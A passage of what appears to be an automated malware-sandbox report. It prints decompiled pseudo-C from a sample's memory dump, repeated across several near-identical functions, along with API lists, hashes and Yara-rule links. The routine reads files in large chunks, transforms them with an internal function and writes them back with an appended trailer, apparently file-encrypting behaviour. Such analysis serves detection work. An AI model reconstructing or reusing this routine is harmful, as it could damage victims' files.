							if(ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000, _t95 - 8, _t92) != 0) {
								L15:
								continue;
							}
							if( *[fs:0x34] != 0x26) {
								if( *[fs:0x34] == 0x3e5) {
									goto L15;
								}
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
								continue;
							}
							goto L3;
						}
						return _t54;
					}
				}
			}

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5BE9
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5C14
CloseHandle.KERNEL32(?), ref: 00CE5C21
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5C30

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: 212b3ffcd6675cab040e86e67f6867cd485c75c1558c0cb0804f5db7eeeeb24c
Instruction ID: cbdaf7e0d0b1786ad563f6791b365e8ea61ddeab95db050b89cae51ca80a64c1
Opcode Fuzzy Hash: 212b3ffcd6675cab040e86e67f6867cd485c75c1558c0cb0804f5db7eeeeb24c
Instruction Fuzzy Hash: C8F01D71500688EFDB119F92DD89FBE777DFB18B54F300161EA11D50A2D730AA40DB06

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5DED, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE5DED() {
				int _t54;
				long _t55;
				intOrPtr _t73;
				void* _t92;
				void* _t95;
				void* _t97;

				while(1) {
					L39:
					while(1) {
						L1:
						_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
						_t92 =  *(_t95 - 4);
						if(_t54 == 0) {
						}
						L2:
						if( *[fs:0x34] != 0x26) {
							L4:
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L2;
							}
						}
						L3:
						 *(_t92 + 0x30) = 2;
						if(PostQueuedCompletionStatus( *0xcf1024, 0, 0, _t92) != 0) {
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L7;
							}
							goto L2;
						}
						goto L4;
						L7:
						if(_t92 != 0) {
							_t55 =  *(_t92 + 0x30);
							if(_t55 != 0) {
								if(_t55 != 1) {
									if(_t55 != 2) {
										L32:
										if(_t55 != 4) {
											do {
												L39:
												goto L1;
											} while (_t55 != 4);
											L33:
											while( *_t92 == 0x103) {
												Sleep(0);
											}
											if( *0xcf092c != 0) {
												 *0xcf0cfa(_t95 - 0x8c, 0xceb4cc,  *(_t92 + 0x2c));
												_t97 = _t97 + 0xc;
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8, _t95 - 0x8c, 0);
											}
											CloseHandle( *(_t92 + 0x2c));
											RtlFreeHeap( *0xcf0a9e, 0, _t92);
											InterlockedIncrement(0xcf103c);
											goto L39;
										}
										goto L33;
									}
									 *(_t92 + 8) = 0xffffffff;
									 *(_t92 + 0xc) = 0xffffffff;
									 *(_t92 + 0x30) = 4;
									if(WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90, _t95 - 8, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
										CloseHandle( *(_t92 + 0x2c));
										RtlFreeHeap( *0xcf0a9e, 0, _t92);
									}
									continue;
								}
								E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104,  *(_t95 - 8));
								if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
									_t73 =  *((intOrPtr*)(_t92 + 0x1c));
									if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
										 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
										asm("adc [ebx+0x18], edx");
										 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
										 *(_t92 + 0x30) = 0;
									} else {
										 *(_t92 + 0x30) = 2;
									}
								} else {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
									asm("adc dword [ebx+0x18], 0x0");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
									 *(_t92 + 0x30) = 0;
								}
								if(WriteFile( *(_t92 + 0x2c), _t92 + 0x104,  *(_t95 - 8), _t95 - 8, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							 *(_t92 + 8) =  *(_t92 + 0x14);
							 *(_t92 + 0xc) =  *(_t92 + 0x18);
							 *(_t92 + 0x30) = 1;
							if(ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000, _t95 - 8, _t92) != 0) {
								L15:
								continue;
							}
							if( *[fs:0x34] != 0x26) {
								if( *[fs:0x34] == 0x3e5) {
									goto L15;
								}
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
								continue;
							}
							goto L3;
						}
						return _t54;
					}
				}
			}

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5BE9
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5C14
CloseHandle.KERNEL32(?), ref: 00CE5C21
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5C30

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: 60984d688fa3147df54384fffa2a563c68b61a10bd67fbe37f02f56c4983bebd
Instruction ID: cbdaf7e0d0b1786ad563f6791b365e8ea61ddeab95db050b89cae51ca80a64c1
Opcode Fuzzy Hash: 60984d688fa3147df54384fffa2a563c68b61a10bd67fbe37f02f56c4983bebd
Instruction Fuzzy Hash: C8F01D71500688EFDB119F92DD89FBE777DFB18B54F300161EA11D50A2D730AA40DB06

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5D82, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE5D82() {
				int _t54;
				long _t55;
				intOrPtr _t73;
				void* _t92;
				void* _t95;
				void* _t97;

				while(1) {
					L39:
					while(1) {
						L1:
						_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
						_t92 =  *(_t95 - 4);
						if(_t54 == 0) {
						}
						L2:
						if( *[fs:0x34] != 0x26) {
							L4:
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L2;
							}
						}
						L3:
						 *(_t92 + 0x30) = 2;
						if(PostQueuedCompletionStatus( *0xcf1024, 0, 0, _t92) != 0) {
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1024, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L7;
							}
							goto L2;
						}
						goto L4;
						L7:
						if(_t92 != 0) {
							_t55 =  *(_t92 + 0x30);
							if(_t55 != 0) {
								if(_t55 != 1) {
									if(_t55 != 2) {
										L32:
										if(_t55 != 4) {
											do {
												L39:
												goto L1;
											} while (_t55 != 4);
											L33:
											while( *_t92 == 0x103) {
												Sleep(0);
											}
											if( *0xcf092c != 0) {
												 *0xcf0cfa(_t95 - 0x8c, 0xceb4cc,  *(_t92 + 0x2c));
												_t97 = _t97 + 0xc;
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8, _t95 - 0x8c, 0);
											}
											CloseHandle( *(_t92 + 0x2c));
											RtlFreeHeap( *0xcf0a9e, 0, _t92);
											InterlockedIncrement(0xcf103c);
											goto L39;
										}
										goto L33;
									}
									 *(_t92 + 8) = 0xffffffff;
									 *(_t92 + 0xc) = 0xffffffff;
									 *(_t92 + 0x30) = 4;
									if(WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90, _t95 - 8, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
										CloseHandle( *(_t92 + 0x2c));
										RtlFreeHeap( *0xcf0a9e, 0, _t92);
									}
									continue;
								}
								E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104,  *(_t95 - 8));
								if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
									_t73 =  *((intOrPtr*)(_t92 + 0x1c));
									if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
										 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
										asm("adc [ebx+0x18], edx");
										 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
										 *(_t92 + 0x30) = 0;
									} else {
										 *(_t92 + 0x30) = 2;
									}
								} else {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
									asm("adc dword [ebx+0x18], 0x0");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
									 *(_t92 + 0x30) = 0;
								}
								if(WriteFile( *(_t92 + 0x2c), _t92 + 0x104,  *(_t95 - 8), _t95 - 8, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							 *(_t92 + 8) =  *(_t92 + 0x14);
							 *(_t92 + 0xc) =  *(_t92 + 0x18);
							 *(_t92 + 0x30) = 1;
							if(ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000, _t95 - 8, _t92) != 0) {
								L15:
								continue;
							}
							if( *[fs:0x34] != 0x26) {
								if( *[fs:0x34] == 0x3e5) {
									goto L15;
								}
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
								continue;
							}
							goto L3;
						}
						return _t54;
					}
				}
			}

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5BE9
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5C14
CloseHandle.KERNEL32(?), ref: 00CE5C21
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5C30

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: f78fd639e0ffb9b4a46f7e311f542cdb8f2179e84e92b7b4cbc9b68d2c44d57d
Instruction ID: cbdaf7e0d0b1786ad563f6791b365e8ea61ddeab95db050b89cae51ca80a64c1
Opcode Fuzzy Hash: f78fd639e0ffb9b4a46f7e311f542cdb8f2179e84e92b7b4cbc9b68d2c44d57d
Instruction Fuzzy Hash: C8F01D71500688EFDB119F92DD89FBE777DFB18B54F300161EA11D50A2D730AA40DB06

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6094, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE6094() {
				int _t54;
				long _t55;
				int _t66;
				intOrPtr _t73;
				int _t78;
				int _t85;
				void* _t92;
				void* _t95;
				void* _t97;

				while(1) {
					L39:
					while(1) {
						L1:
						_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
						_t92 =  *(_t95 - 4);
						if(_t54 == 0) {
						}
						L2:
						if( *[fs:0x34] != 0x26) {
							L4:
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L2;
							}
						}
						L3:
						 *(_t92 + 0x30) = 2;
						if(PostQueuedCompletionStatus( *0xcf1028, 0, 0, _t92) != 0) {
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L7;
							}
							goto L2;
						}
						goto L4;
						L7:
						if(_t92 != 0) {
							_t55 =  *(_t92 + 0x30);
							if(_t55 != 0) {
								if(_t55 != 1) {
									if(_t55 != 2) {
										L32:
										if(_t55 != 4) {
											do {
												L39:
												goto L1;
											} while (_t55 != 4);
											L33:
											while( *_t92 == 0x103) {
												Sleep(0);
											}
											if( *0xcf092c != 0) {
												 *0xcf0cfa(_t95 - 0x8c, 0xceb4cc,  *(_t92 + 0x2c));
												_t97 = _t97 + 0xc;
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8, _t95 - 0x8c, 0);
											}
											CloseHandle( *(_t92 + 0x2c));
											RtlFreeHeap( *0xcf0a9e, 0, _t92); // executed
											InterlockedIncrement(0xcf1044);
											goto L39;
										}
										goto L33;
									}
									 *(_t92 + 8) = 0xffffffff;
									 *(_t92 + 0xc) = 0xffffffff;
									 *(_t92 + 0x30) = 4;
									_t66 = WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90, _t95 - 8, _t92); // executed
									if(_t66 == 0 &&  *[fs:0x34] != 0x3e5) {
										CloseHandle( *(_t92 + 0x2c));
										RtlFreeHeap( *0xcf0a9e, 0, _t92);
									}
									continue;
								}
								E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104,  *(_t95 - 8));
								if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
									_t73 =  *((intOrPtr*)(_t92 + 0x1c));
									if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
										 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
										asm("adc [ebx+0x18], edx");
										 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
										 *(_t92 + 0x30) = 0;
									} else {
										 *(_t92 + 0x30) = 2;
									}
								} else {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
									asm("adc dword [ebx+0x18], 0x0");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
									 *(_t92 + 0x30) = 0;
								}
								_t78 = WriteFile( *(_t92 + 0x2c), _t92 + 0x104,  *(_t95 - 8), _t95 - 8, _t92); // executed
								if(_t78 == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							 *(_t92 + 8) =  *(_t92 + 0x14);
							 *(_t92 + 0xc) =  *(_t92 + 0x18);
							 *(_t92 + 0x30) = 1;
							_t85 = ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000, _t95 - 8, _t92); // executed
							if(_t85 != 0) {
								L15:
								continue;
							}
							if( *[fs:0x34] != 0x26) {
								if( *[fs:0x34] == 0x3e5) {
									goto L15;
								}
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
								continue;
							}
							goto L3;
						}
						return _t54;
					}
				}
			}

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5E90
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5EBB
CloseHandle.KERNEL32(?), ref: 00CE5EC8
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5ED7

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: 9027af5a90a1d6af9f417929792199b01bc642e3bee05306ef161d4310578455
Instruction ID: 85f4700a00a8a94e7d75d0c9b30b74321db23eda9d9887638ca6ba377ac1f5a0
Opcode Fuzzy Hash: 9027af5a90a1d6af9f417929792199b01bc642e3bee05306ef161d4310578455
Instruction Fuzzy Hash: F7F01271600684EFDB11DF92DC89FBD777DEB08B54F300161E915950A2D735AB44DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5F6B, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE5F6B() {
				int _t54;
				long _t55;
				int _t66;
				intOrPtr _t73;
				int _t78;
				int _t85;
				void* _t92;
				void* _t95;
				void* _t97;

				while(1) {
					L39:
					while(1) {
						L1:
						_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
						_t92 =  *(_t95 - 4);
						if(_t54 == 0) {
						}
						L2:
						if( *[fs:0x34] != 0x26) {
							L4:
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L2;
							}
						}
						L3:
						 *(_t92 + 0x30) = 2;
						if(PostQueuedCompletionStatus( *0xcf1028, 0, 0, _t92) != 0) {
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L7;
							}
							goto L2;
						}
						goto L4;
						L7:
						if(_t92 != 0) {
							_t55 =  *(_t92 + 0x30);
							if(_t55 != 0) {
								if(_t55 != 1) {
									if(_t55 != 2) {
										L32:
										if(_t55 != 4) {
											do {
												L39:
												goto L1;
											} while (_t55 != 4);
											L33:
											while( *_t92 == 0x103) {
												Sleep(0);
											}
											if( *0xcf092c != 0) {
												 *0xcf0cfa(_t95 - 0x8c, 0xceb4cc,  *(_t92 + 0x2c));
												_t97 = _t97 + 0xc;
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8, _t95 - 0x8c, 0);
											}
											CloseHandle( *(_t92 + 0x2c));
											RtlFreeHeap( *0xcf0a9e, 0, _t92); // executed
											InterlockedIncrement(0xcf1044);
											goto L39;
										}
										goto L33;
									}
									 *(_t92 + 8) = 0xffffffff;
									 *(_t92 + 0xc) = 0xffffffff;
									 *(_t92 + 0x30) = 4;
									_t66 = WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90, _t95 - 8, _t92); // executed
									if(_t66 == 0 &&  *[fs:0x34] != 0x3e5) {
										CloseHandle( *(_t92 + 0x2c));
										RtlFreeHeap( *0xcf0a9e, 0, _t92);
									}
									continue;
								}
								E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104,  *(_t95 - 8));
								if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
									_t73 =  *((intOrPtr*)(_t92 + 0x1c));
									if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
										 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
										asm("adc [ebx+0x18], edx");
										 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
										 *(_t92 + 0x30) = 0;
									} else {
										 *(_t92 + 0x30) = 2;
									}
								} else {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
									asm("adc dword [ebx+0x18], 0x0");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
									 *(_t92 + 0x30) = 0;
								}
								_t78 = WriteFile( *(_t92 + 0x2c), _t92 + 0x104,  *(_t95 - 8), _t95 - 8, _t92); // executed
								if(_t78 == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							 *(_t92 + 8) =  *(_t92 + 0x14);
							 *(_t92 + 0xc) =  *(_t92 + 0x18);
							 *(_t92 + 0x30) = 1;
							_t85 = ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000, _t95 - 8, _t92); // executed
							if(_t85 != 0) {
								L15:
								continue;
							}
							if( *[fs:0x34] != 0x26) {
								if( *[fs:0x34] == 0x3e5) {
									goto L15;
								}
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
								continue;
							}
							goto L3;
						}
						return _t54;
					}
				}
			}

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5E90
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5EBB
CloseHandle.KERNEL32(?), ref: 00CE5EC8
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5ED7

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: 22771274987bc1650450e2beb72d1b6fb1bc01ee7d519c7179c5c7eaa866f942
Instruction ID: 85f4700a00a8a94e7d75d0c9b30b74321db23eda9d9887638ca6ba377ac1f5a0
Opcode Fuzzy Hash: 22771274987bc1650450e2beb72d1b6fb1bc01ee7d519c7179c5c7eaa866f942
Instruction Fuzzy Hash: F7F01271600684EFDB11DF92DC89FBD777DEB08B54F300161E915950A2D735AB44DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6029, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE6029() {
				int _t54;
				long _t55;
				int _t66;
				intOrPtr _t73;
				int _t78;
				int _t85;
				void* _t92;
				void* _t95;
				void* _t97;

				while(1) {
					L39:
					while(1) {
						L1:
						_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
						_t92 =  *(_t95 - 4);
						if(_t54 == 0) {
						}
						L2:
						if( *[fs:0x34] != 0x26) {
							L4:
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L2;
							}
						}
						L3:
						 *(_t92 + 0x30) = 2;
						if(PostQueuedCompletionStatus( *0xcf1028, 0, 0, _t92) != 0) {
							while(1) {
								L1:
								_t54 = GetQueuedCompletionStatus( *0xcf1028, _t95 - 8, _t95 - 0xc, _t95 - 4, 0xffffffff);
								_t92 =  *(_t95 - 4);
								if(_t54 == 0) {
								}
								goto L7;
							}
							goto L2;
						}
						goto L4;
						L7:
						if(_t92 != 0) {
							_t55 =  *(_t92 + 0x30);
							if(_t55 != 0) {
								if(_t55 != 1) {
									if(_t55 != 2) {
										L32:
										if(_t55 != 4) {
											do {
												L39:
												goto L1;
											} while (_t55 != 4);
											L33:
											while( *_t92 == 0x103) {
												Sleep(0);
											}
											if( *0xcf092c != 0) {
												 *0xcf0cfa(_t95 - 0x8c, 0xceb4cc,  *(_t92 + 0x2c));
												_t97 = _t97 + 0xc;
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8, _t95 - 0x8c, 0);
											}
											CloseHandle( *(_t92 + 0x2c));
											RtlFreeHeap( *0xcf0a9e, 0, _t92); // executed
											InterlockedIncrement(0xcf1044);
											goto L39;
										}
										goto L33;
									}
									 *(_t92 + 8) = 0xffffffff;
									 *(_t92 + 0xc) = 0xffffffff;
									 *(_t92 + 0x30) = 4;
									_t66 = WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90, _t95 - 8, _t92); // executed
									if(_t66 == 0 &&  *[fs:0x34] != 0x3e5) {
										CloseHandle( *(_t92 + 0x2c));
										RtlFreeHeap( *0xcf0a9e, 0, _t92);
									}
									continue;
								}
								E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104,  *(_t95 - 8));
								if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
									_t73 =  *((intOrPtr*)(_t92 + 0x1c));
									if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
										 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
										asm("adc [ebx+0x18], edx");
										 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
										 *(_t92 + 0x30) = 0;
									} else {
										 *(_t92 + 0x30) = 2;
									}
								} else {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
									asm("adc dword [ebx+0x18], 0x0");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
									 *(_t92 + 0x30) = 0;
								}
								_t78 = WriteFile( *(_t92 + 0x2c), _t92 + 0x104,  *(_t95 - 8), _t95 - 8, _t92); // executed
								if(_t78 == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							 *(_t92 + 8) =  *(_t92 + 0x14);
							 *(_t92 + 0xc) =  *(_t92 + 0x18);
							 *(_t92 + 0x30) = 1;
							_t85 = ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000, _t95 - 8, _t92); // executed
							if(_t85 != 0) {
								L15:
								continue;
							}
							if( *[fs:0x34] != 0x26) {
								if( *[fs:0x34] == 0x3e5) {
									goto L15;
								}
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
								continue;
							}
							goto L3;
						}
						return _t54;
					}
				}
			}

APIs

